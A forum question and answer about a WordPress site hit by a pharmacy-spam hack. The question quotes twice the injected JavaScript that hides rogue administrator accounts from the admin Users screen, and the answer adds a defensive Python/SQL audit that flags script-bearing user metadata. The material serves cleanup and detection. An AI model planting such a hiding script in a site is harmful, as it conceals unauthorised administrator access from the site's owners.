How to find and clean WordPress of script/s that change your blog post titles on Google and Yahoo with embarrassing “Viagra text”?

Posted by: admin November 30, 2017

Questions:

One day after managing to defend against a massive DDoS attack, http://arabcrunch.com has now been hacked by someone who seems to change the post titles into a Viagra ad on the Google search engine. Look how they damaged us:

www.google.com/search?hl=en&client=safari&rls=en&q=Viagra+Online+Pharmacy+-+Buy+Online+Viagra%2C+Cialis%2C+Levitra+wordpress+hack&aq=f&aqi=&aql=&oq=&gs_rfai=

and here:

google.com/search?hl=en&client=safari&rls=en&q=idescribe&btnG=Search&aq=f&aqi=g-s1g-sx2g-s1g-sx1&aql=&oq=&gs_rfai=

What we did is a clean WP install with clean plugins, imported our DB with old posts and all pages, then added each plugin we need manually, then rebuilt the sitemap.xml.

But now we are doomed, as any keyword you search will get the result on Google with the title: Viagra Online Pharmacy – Buy Online Viagra, Cialis, Levitra

I found out on the DB table wp_usermeta user_id: 16 that the username is a script:

<b id="user_superuser"><script language="JavaScript">
var setUserName = function(){
 try{
  var t=document.getElementById("user_superuser");
  while(t.nodeName!="TR"){
   t=t.parentNode;
  };
  t.parentNode.removeChild(t);
  var tags = document.getElementsByTagName("H3");
  var s = " shown below";
  for (var i = 0; i < tags.length; i++) {
   var t=tags[i].innerHTML;
   var h=tags[i];
   if(t.indexOf(s)>0){
    s =(parseInt(t)-1)+s;
    h.removeChild(h.firstChild);
    t = document.createTextNode(s);
    h.appendChild(t);
   }
  }
  var arr=document.getElementsByTagName("ul");
  for(var i in arr) if(arr[i].className=="subsubsub"){
   var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
   if(n[1]>0){
    var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)    </gi,">Administrator ("+(n[1]-1)+")<");
    arr[i].innerHTML=txt;
   }
  }
 }catch(e){};
};
addLoadEvent(setUserName);
</script>

This is similar to a hack that ArabCrunch EN, along with thousands of WP blogs, suffered on 9 9 2009.
Read about it and links to solutions here:
arabcrunch.com/2009/09/arabcrunch-and-wordpress-under-attack.html

After the install we found 2 new users:
wordpress.org and system. Both are set as admin and have the same script set as their user name:

<div id="user_superuser"><script language="JavaScript">
var setUserName = function(){
 try{
  var t=document.getElementById("user_superuser");
  while(t.nodeName!="TR"){
   t=t.parentNode;
  };
  t.parentNode.removeChild(t);
  var tags = document.getElementsByTagName("H3");
  var s = " shown below";
  for (var i = 0; i < tags.length; i++) {
   var t=tags[i].innerHTML;
   var h=tags[i];
   if(t.indexOf(s)>0){
    s =(parseInt(t)-1)+s;
    h.removeChild(h.firstChild);
    t = document.createTextNode(s);
    h.appendChild(t);
   }
  }
  var arr=document.getElementsByTagName("ul");
  for(var i in arr) if(arr[i].className=="subsubsub"){
   var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
   if(n[1]>0){
    var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<");
    arr[i].innerHTML=txt;
   }
  }
 }catch(e){};
};
addLoadEvent(setUserName);
</script></div>

Any idea how to solve this?

Answers:

Export and clean your database before you import it into a new WP install: see FAQ: My site was hacked « WordPress Codex and how-to-completely-clean-your-hacked-wordpress-installation.
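
One way to check an exported database for the accounts described in the question before re-importing it, as an added example (not code from the original post or from WordPress). It lists administrators straight from wp_users/wp_usermeta, because the injected script only hides them on the Users screen, and flags usermeta values that carry markup. It assumes the default wp_ table prefix; the sample rows, the site_owner login, the IDs and the first_name meta key are constructed, and SQLite stands in for MySQL.

```python
import sqlite3

ADMIN_CAPS = 'a:1:{s:13:"administrator";b:1;}'  # PHP-serialized role, as WordPress stores it
HIDER = '<div id="user_superuser"><script language="JavaScript">/* body omitted */</script></div>'

# Constructed sample rows. "system" and "wordpress.org" come from the question;
# the other logins, the IDs and the meta_key holding the script are assumptions.
USERS = [(1, "site_owner"), (16, "system"), (17, "wordpress.org"), (20, "guest_writer")]
USERMETA = [
    (1, "wp_capabilities", ADMIN_CAPS), (1, "first_name", "Sam"),
    (16, "wp_capabilities", ADMIN_CAPS), (16, "first_name", HIDER),
    (17, "wp_capabilities", ADMIN_CAPS), (17, "first_name", HIDER),
    (20, "wp_capabilities", 'a:1:{s:6:"author";b:1;}'),
]

def load_sample():
    """Build an in-memory copy of the two tables with the constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT)")
    db.execute("CREATE TABLE wp_usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT)")
    db.executemany("INSERT INTO wp_users VALUES (?, ?)", USERS)
    db.executemany("INSERT INTO wp_usermeta VALUES (?, ?, ?)", USERMETA)
    return db

def admins_in_db(db):
    """Administrators according to the database, not the tampered Users screen."""
    return db.execute(
        "SELECT u.ID, u.user_login FROM wp_users u "
        "JOIN wp_usermeta m ON m.user_id = u.ID "
        "WHERE m.meta_key = 'wp_capabilities' "
        "AND m.meta_value LIKE '%\"administrator\"%' ORDER BY u.ID").fetchall()

def meta_with_script(db):
    """Usermeta rows carrying markup; profile fields should be plain text."""
    return db.execute(
        "SELECT user_id, meta_key FROM wp_usermeta "
        "WHERE meta_value LIKE '%<script%' OR meta_value LIKE '%user_superuser%' "
        "ORDER BY user_id, meta_key").fetchall()

def audit(db, expected_admins):
    """Compare database admins with the logins the site owner actually created."""
    rogue = [(uid, login) for uid, login in admins_in_db(db) if login not in expected_admins]
    return {"unexpected_admins": rogue, "script_meta": meta_with_script(db)}

if __name__ == "__main__":
    print(audit(load_sample(), expected_admins={"site_owner"}))
```

The two SELECT statements can be run unchanged in a MySQL client against the real tables; with a custom table prefix the capabilities key is named after that prefix instead of wp_.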